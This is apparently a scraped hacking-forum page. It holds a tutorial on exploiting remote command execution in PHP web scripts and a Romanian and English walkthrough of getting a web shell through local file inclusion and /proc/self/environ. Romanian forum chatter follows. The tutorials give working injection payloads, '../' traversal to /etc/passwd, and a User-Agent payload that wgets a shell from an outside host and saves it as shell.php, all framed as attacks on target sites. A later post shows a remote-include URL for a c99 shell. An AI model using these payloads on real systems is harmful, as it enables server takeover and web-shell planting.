SirGod

---------------- How to find RCE in scripts (with examples) ---------------- ---------------- By SirGod ---------------- ---------------- www.insecurity-ro.org ---------------- ---------------- www.h4cky0u.org ---------------- - In this tutorial I will show you how to find Remote Command Execution vulnerabilities in PHP Web Applications (scripts). - Through Remote Command Execution vulnerabilities you can execute commands on the webserver. - I will present 4 examples + the basic one. - I will start with a basic example. File : index.php Code snippet : <?php $cmd=$_GET['cmd']; system($cmd); ?> So if we do the following request index.php?cmd=whoami Our command will be executed. In PHP is more functions that let you to execute commands : exec — Execute an external program passthru — Execute an external program and display raw output shell_exec — Execute command via shell and return the complete output as a string system — Execute an external program and display the output If in script is used exec() you can't see the command output(but the command is executed) until the result isn't echo'ed from script.Example : <?php $cmd=$_GET['cmd']; echo exec($cmd); ?> But this is only an basic example of Remote Command Execution.You will neved find this in PHP scripts unless the coder is a monkey. 1) - Lets start with an real-life example.All the following examples is real-life.All of them are discovered by me in different php scripts. The 1st example is an whois lookup script,they execute command in terminal to do that. Works only on *NIX systems. Lets take a look in dig.php file : Code snippet : <?php include("common.php"); showMenu(); echo '<br>'; $status = $_GET['status']; $ns = $_GET['ns']; $host = $_GET['host']; $query_type = $_GET['query_type']; // ANY, MX, A , etc. $ip = $_SERVER['REMOTE_ADDR']; $self = $_SERVER['PHP_SELF']; .................................................................................. $host = trim($host); $host = strtolower($host); echo("<span class=\"plainBlue\"><b>Executing : <u>dig @$ns $host $query_type</u></b><br>"); echo '<pre>'; //start digging in the namserver system ("dig @$ns $host $query_type"); echo '</pre>'; } else { ?> We are interested in these lines : $ns = $_GET['ns']; system ("dig @$ns $host $query_type"); The "ns" variable is unfiltered and can be modified by user.An attacker can use any command that he want through this variable.We can execute commands like in the previous example. If we request : dig.php?ns=whoam&host=sirgod.net&query_type=NS&status=digging Will not work.Why?The code will be system ("dig whoami sirgod.com NS"); and that command dont exist and the execution will fail.What to do to work?In *NIX systems we have the AND operator who can be used in terminal.That operator is ||.So if we make a request like this : dig.php?ns=||whoami||&host=sirgod.net&query_type=NS&status=digging our command will be succesfully executed.Look at the code : system ("dig ||whoami|| sirgod.net NS"); will execute the command separately than "dig" and the other. 2) - Lets continue with another example,little bit complicated than first. Some scripts let you to modify the configuration of website after install.Bad mistake because usually configuration files is .php . So we have the script instaled.We look in the admin.php file Code snippet : if(isset($action) && $action == "setconfig") { $config_file = "config.php"; $handle = fopen($config_file, 'w'); $StringData = "<?php\r $"."news_width = '".clean($_POST[news_width])."';\r $"."bgcolor = '".clean($_POST[bgcolor])."';\r $"."fgcolor = '".clean($_POST[fgcolor])."';\r $"."padding = '".clean($_POST[padding])."';\r $"."subject_margin = '".clean($_POST[subject_margin])."';\r $"."fontname = '".clean($_POST[fontname])."';\r $"."fontsize = '".clean($_POST[fontsize])."';\r\n?>"; fwrite($handle, $StringData); } We see here that the script save the settings in config.php file. Now let's see the config.php file content : Code snippet : <?php $news_width = '600px'; $bgcolor = '#000000'; $fgcolor = '#ffffff'; $padding = '5px'; $subject_margin = '0px'; $fontname = 'verdana'; $fontsize = '13px'; ?> So we cand inject php code in news_width for example .Now,the things will be more complicated.We can inject our code but we must pay attention to the code. I will show you an example to understand what I say. We will inject the following php code in news_width variable.The code will be written into config.php file.Let's go to admin.php?action=setconfig file and inject the code. Code : <?php system($_GET['cmd']); ?> The code will become : <?php $news_width = '<?php system($_GET['cmd']); ?>'; $bgcolor = '#000000'; $fgcolor = '#ffffff'; $padding = '5px'; $subject_margin = '0px'; $fontname = 'verdana'; $fontsize = '13px'; ?> And that is wrong.If we request the config.php file we will get an parse error: Parse error: parse error in C:\wamp\www\config.php on line 3 So we must inject something more complicated. ';system($_GET['cmd']);' Why this code?Look,the code inside config.php file will become : <?php $news_width = '';system($_GET['cmd']);''; $bgcolor = '#000000'; $fgcolor = '#ffffff'; $padding = '5px'; $subject_margin = '0px'; $fontname = 'verdana'; $fontsize = '13px'; ?> Lets split it : $news_width = ''; system($_GET['cmd']); ''; No parse error,so we can succesfully execute our commands.Let's make the request : config.php?cmd=whoami No more || because we don't need,only our command is executed. 3) - Lets go to the next example.In this script the news are saved in news.txt file. Lets see the contents of news.txt file : <table class='sn'> <tbody> <tr><td class='sn-title'> test </td></tr> <tr><td class='sn-date'> Posted on: 08/06/2009 </td></tr> <tr><td class='sn-post'> test </td></tr> </tbody></table><div><br /></div> We can add what we want.We can inject our code and nothing will happen because is .txt file?Wrong. Lets search deeper the script.We go to post news by accessing post.php . Lets take a look in post.php $newsfile = "news.txt"; $file = fopen($newsfile, "r"); .......................................................................... elseif ((isset($_REQUEST["title"])) && (isset($_REQUEST["date"])) && (isset($_REQUEST["post"])) && ($_REQUEST["title"]!="") && ($_REQUEST["date"]!="") && ($_REQUEST["post"]!="")) { $current_data = @fread($file, filesize($newsfile)); fclose($file); $file = fopen($newsfile, "w"); $_REQUEST["post"] = stripslashes(($_REQUEST["post"])); $_REQUEST["date"] = stripslashes(($_REQUEST["date"])); $_REQUEST["title"] = stripslashes(($_REQUEST["title"])); if(fwrite($file,$btable . " " . $btitle . " " . $_REQUEST["title"] . " " . $etitle . " " . $bdate . " " . $_REQUEST["date"] . " " . $edate . " " . $bpost . " " . $_REQUEST["post"] . " " . $epost . " " . $etable . "\n " . $current_data)) include 'inc/posted.html'; else include 'inc/error1.html'; fclose($file); } We can see here how the news are written in news.txt file.Input not filtered of course. Now the news must be displayed to visitors.How the script do that?Lets take a look in display.php file. Code snippet : <? include("news.txt"); ?> Nice,the news.txt content is included in display.php file.What we do?We go to post.php and add some news. We will inject our code in "title" variable.We write there the following code : <?php system($_GET['cmd']); ?> so the news.txt content will become : <table class='sn'> <tbody> <tr><td class='sn-title'> <?php system($_GET['cmd']); ?> </td></tr> <tr><td class='sn-date'> Posted on: 08/06/2009 </td></tr> <tr><td class='sn-post'> test2 </td></tr> </tbody></table><div><br /></div> <table class='sn'> <tbody> <tr><td class='sn-title'> test </td></tr> <tr><td class='sn-date'> Posted on: 08/06/2009 </td></tr> <tr><td class='sn-post'> test </td></tr> </tbody></table><div><br /></div> And our evil code is there.Let's take a look in display.php .That file include the content of news.txt, so the code in display.php will look like : <? <table class='sn'> <tbody> <tr><td class='sn-title'> <?php system($_GET['cmd']); ?> </td></tr> <tr><td class='sn-date'> Posted on: 08/06/2009 </td></tr> <tr><td class='sn-post'> test2 </td></tr> </tbody></table><div><br /></div> <table class='sn'> <tbody> <tr><td class='sn-title'> test </td></tr> <tr><td class='sn-date'> Posted on: 08/06/2009 </td></tr> <tr><td class='sn-post'> test </td></tr> </tbody></table><div><br /></div> ?> No parse error or any other problem so we can go to : display.php?cmd=whoami and execute succesfully our commands. 4) - Now a little bit complicated script than the previous scripts. In this script,when we register,our details will be saved in php files. Lets take a loog in add_reg.php file : Code snippet : $user = $_POST['user']; $pass1 = $_POST['pass1']; $pass2 = $_POST['pass2']; $email1 = $_POST['email1']; $email2 = $_POST['email2']; $location = $_POST['location']; $url = $_POST['url']; $filename = "./sites/".$user.".php"; .............................................. $html = "<?php \$regdate = \"$date\"; \$user = \"$user\"; \$pass = \"$pass1\"; \$email = \"$email1\"; \$location = \"$location\"; \$url = \"$url\"; ?>"; $fp = fopen($filename, 'a+'); fputs($fp, $html) or die("Could not open file!"); We can see that the script creates a php file in "sites" directory( ourusername.php ). The script save all the user data in that file so we can inject our evil code into one field,I choose the "location" variable. So if we register as an user with the location (set the "location" value) : <?php system($_GET['cmd']); ?> the code inside ourusername.php will become : <?php $regdate = "13 June 2009, 4:16 PM"; $user = "pwned"; $pass = "pwned"; $email = "pwned@yahoo.com"; $location = "<?php system($_GET['cmd']); ?>"; $url = "http://google.ro"; ?> So we will get an parse error.Not good.We must inject a more complicated code to get the result that we want. Lets add this code : \";?><?php system(\$_GET['cmd']);?><?php \$xxx=\":D So the code inside ourusername.php will become : <?php $regdate = "13 June 2009, 4:16 PM"; $user = "pwned"; $pass = "pwned"; $email = "pwned@yahoo.com"; $location = "";?><?php system($_GET['cmd']);?><?php $xxx=":D"; $url = "http://google.ro"; ?> and we will have no error.Why?See the code : $location = "";?><?php system($_GET['cmd']);?><?php $xxx=":D"; Lets split it : $location = ""; ?> <?php system($_GET['cmd']);?> <?php $xxx=":D"; We set the location value to "",close the first php tags,open the tags again,wrote our evil code,close the tags and open other and add a variable "xxx" because we dont want any error.I wrote that code because I want no error,can be modified to be small but will give some errors(will not stop us to execute commands but looks ugly). So we can go to : sites/ourusername.php?cmd=whoami and successfully execute our commands. Shoutz to all members of www.insecurity-ro.org and www.h4cky0u.org

Sper sa fi explicat bine,deoarece e primul meu tutorial.

>>>>>>>>>>>>>> Shell prin LFI - metoda proc/self/environ <<<<<<<<<<<<<<< >>>>>>>>>>>>>>> Author : SirGod <<<<<<<<<<<<<<< >>>>>>>>>>>>>>> www.insecurity-ro.org <<<<<<<<<<<<<<< >>>>>>>>>>>>>>> www.h4cky0u.org <<<<<<<<<<<<<<< >>>>>>>>>>>>>>> sirgod08@gmail.com <<<<<<<<<<<<<<< 1 - Introducere 2 - Descoperire LFI 3 - Verificam daca proc/self/environ e accesibil 4 - Injectare cod malitios 5 - Acces la shell 6 - Multumiri >> 1 - Introducere In acestu tutorial va voi arata cum sa obtineti un shell pe un site folosindu-va de Local File Inclusion si injectand cod malitios in proc/self/environ.Este un tutorial care explica totul pas cu pas. >> 2 - Descoperire LFI - Acum sa gasim o un site vulnerabil la Local File Inclusion.Am gasit tinta,sa verificam www.website.com/view.php?page=contact.php - Acum sa inlocuim contact.php cu ../ si URL-ul va devenii www.website.com/view.php?page=../ si avem o eroare. Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337 sanse mari sa avem o vulnerabilitate de tip Local File Inclusion.Sa trecem mai departe. - Sa verificam daca putem accesa etc/passwd ca sa vedem daca este vulnerabil la Local File Inclusion.Sa face un request : www.website.com/view.php?page=../../../etc/passwd avem o eroare si fisierul etc/passwd nu este inclus. Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337 urcam cateva directorii www.website.com/view.php?page=../../../../../etc/passwd am inclus cu succes fisierul etc/passwd. root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin test:x:13:30:test:/var/test:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin >> 3 - Verificam daca proc/self/environ e accesibil - Acum sa vedem daca proc/self/environ este accesibil.O sa inlocuim etc/passwd cu proc/self/environ www.website.com/view.php?page=../../../../../proc/self/environ Daca primiti ceva de genul DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster@website.com SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE= Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.website.com Port 80 proc/self/environ este accesibil.Daca primiti o pagina alba,o eroare inseamna ca nu este accesibil sau sistemul de operare este FreeBSD. >> 4 - Injectare cod malitios - Acum sa injectam codul nostru malitios in proc/self/environ.Cum putem face asta?Injectam codul in HTTP Header-ul User-Agent. Folositi addon-ul Tamper Data pentru Firefox pentru a schimba User-Agent-ul.Porniti Tamper Data si faceti un request la URL-ul : www.website.com/view.php?page=../../../../../proc/self/environ Alegeti Tamper si in campul User-Agent scrieti urmatorul cod : <?system('wget http://hack-bay.com/Shells/gny.txt -O shell.php');?> Apoi dati submit la request. Comanda noastra va fi executata(o sa descarce un shell txt de la adresa http://hack-bay.com/Shells/gny.txt si il va salva ca shell.php in directorul site-ului) prin intermediul functiei system(),si shell-ul nostru va fi creat.Daca nu merge,incercati exec() pentru ca system() poate fi restrictionat pe server din php.ini >> 5 - Acces la shell - Acuma sa verificam daca codul nostru malitios a fost injectat cu succes.Sa vedem daca shell-ul este prezent. www.website.com/shell.php Shell-ul nostru este acolo.Injectia a fost efectuata cu succes. >> 6 - Multumiri Multumiri membrilor www.insecurity-ro.org si www.h4cky0u.org .

>>>>>>>>>>>>>>> Shell via LFI - proc/self/environ method <<<<<<<<<<<<<<< >>>>>>>>>>>>>>> Author : SirGod <<<<<<<<<<<<<<< >>>>>>>>>>>>>>> www.insecurity-ro.org <<<<<<<<<<<<<<< >>>>>>>>>>>>>>> www.h4cky0u.org <<<<<<<<<<<<<<< >>>>>>>>>>>>>>> sirgod08@gmail.com <<<<<<<<<<<<<<< 1 - Introduction 2 - Finding LFI 3 - Checking if proc/self/environ is accessible 4 - Injecting malicious code 5 - Access our shell 6 - Shoutz >> 1 - Introduction In this tutorial I show you how to get a shell on websites using Local File Inclusion vulnerabilities and injection malicious code in proc/self/environ.Is a step by step tutorial. >> 2 - Finding LFI - Now we are going to find a Local File Inclusion vulnerable website.So we found our target,lets check it. www.website.com/view.php?page=contact.php - Now lets replace contact.php with ../ so the URL will become www.website.com/view.php?page=../ and we got an error Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337 big chances to have a Local File Inclusion vulnerability.Let's go to next step. - Now lets check for etc/passwd to see the if is Local File Inclusion vulnerable.Lets make a request : www.website.com/view.php?page=../../../etc/passwd we got error and no etc/passwd file Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337 so we go more directories up www.website.com/view.php?page=../../../../../etc/passwd we succesfully included the etc/passwd file. root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin test:x:13:30:test:/var/test:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin >> 3 - Checking if proc/self/environ is accessible - Now lets see if proc/self/environ is accessible.We replace etc/passwd with proc/self/environ www.website.com/view.php?page=../../../../../proc/self/environ If you get something like DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster@website.com SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE= Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.website.com Port 80 proc/self/environ is accessible.If you got a blank page,an error proc/self/environ is not accessible or the OS is FreeBSD. >> 4 - Injecting malicious code - Now let's inject our malicious code in proc/self/environ.How we can do that?We can inject our code in User-Agent HTTP Header. Use Tamper Data Addon for Firefox to change the User-Agent.Start Tamper Data in Firefox and request the URL : www.website.com/view.php?page=../../../../../proc/self/environ Choose Tamper and in User-Agent filed write the following code : <?system('wget http://hack-bay.com/Shells/gny.txt -O shell.php');?> Then submit the request. Our command will be executed (will download the txt shell from http://hack-bay.com/Shells/gny.txt and will save it as shell.php in the website directory) through system(), and our shell will be created.If don't work,try exec() because system() can be disabled on the webserver from php.ini. >> 5 - Access our shell - Now lets check if our malicous code was successfully injected.Lets check if the shell is present. www.website.com/shell.php Our shell is there.Injection was succesfully. >> 6 - Shoutz Shoutz to all members of www.insecurity-ro.org and www.h4cky0u.org.

Da,arata continutul din apache logs dar nu il executa,deci nu poti obtine remote command execution.

Nu strict la include().Ci la : include() include_once() require() require_once() Restu doar citesc continutul,nu il includ => ca nu il poti utiliza,daca incluzi un fisier care are cod php in el va "executa" codul php,dar daca CITESTI(file_get_contents,etc) NU IL VA EXECUTA,doar va arata continutul fisierului.

Nu INCLUDE.Nu e tot aia.Doar afiseaza.Uite un exemplu ca sa faci diferenta : <? $variabila=$_GET['variabila']; $variabila2=$_GET['variabila2']; include "$variabila"; file_get_contents "$variabila2"; ?> Se intampla acelasi lucru?Daca avem : index.php?variabila=../shell.txt Va include continutul,si vei avea shell. Daca avem index.php?variabila2=../shell.txt Iti va arata continutul txt-ului,nu va executa php. Eh,load_file() e asemanator cu file_get_contents() nu cu include().

load_file != LFI ,load_file iti arata continutul fisierului,LFI il include,si in orice caz,LFI prin SQLI nu se poate,si nici prin altceva,e pur si simplu LFI.

LFI exploiter sau load_file?Anyway,bravo.

Romania FTW

Ar fi frumos unul,scoate-ti chatul si bagati Unreal IRCD,faceti server si canal de IRC,ca tot aveti dedicat,eu zic ca ar atrage mai multa lume decat chatul.

Dupa cum am zis,simplu.Anyway,felicitari.

370HSSV-0773H Nu este facut de mine,e simplu dar ingenios.

Scapati de zmeii de pe aici care nu stiu decat sa strice forumu,nu trebuie sa dau nume,se simt ei singuri.Nu stiu daca 50% din topicele mai discutate se lasa fara "bag pula-n mata","ratat","lamer","muist" si toata gama.Va intrebati cu ce ajuta acesti zmei forumul?Uite cu ce: - i-au stricat reputatia pe care o avea odata - il fac sa para un forum de copilasi - cele mai vizualizate/discutate topice devin cele cu injuraturi - utilizatorii incepatori sunt luati la misto - etc Nu zic sa ii excludeti,doar calmatii putin,si cred ca va fi mai bine.

Au facut la misto Duckadam cu handbalul la fel ca Brancusi cu pictura. @ Hertz

Site-ul va rula PHP-Fusion.Coderii trebuie sa implementeze un sistem de punctare si un clasament + implementarea misiunilor.Numele domeniului va fi ales la comun acord.Oricine se poate implica cu propuneri pentru misiuni.

Se rezolva.Zi cu ce poti ajuta.

Intai sa ne strangem cativa,ca daca suntem 2 nu are rost.Domeniul e ieftin,cu hostul o rezolvam noi.

Ar fi frumos unul romanesc.Organizarea o vom face dupa,sa vedem cati vom fi,care vom fi,si ce vom face fiecare.Se baga cineva?

Au mai luat-o o data sau de 2 ori de la Cyber Terrorist din cate am vazut acolo acum ceva timp.

De ce ai mai facut un tutorial?Nu erau destule?Ce are asta in plus si altele nu?(in afara faptului ca e cu numele tau pe el)

1) Nu sunt numai 2 shelluri,r57 si c99.Exista c100,TDShell,etc.. 2) Poti folosi si shell-uri in format .txt pentru a le include www.site.com/pagina.php?modul=http://www.gigi.com/c99.txt? .

Eh,cat pot si io.Oricum ideea mea nu era sa umplu eu categoria,dar mi se pare un "must have".

1) User Created PoC's/Exploits 2) Member Releases

Si io vreau un "hack" care sami dea numerele la loto.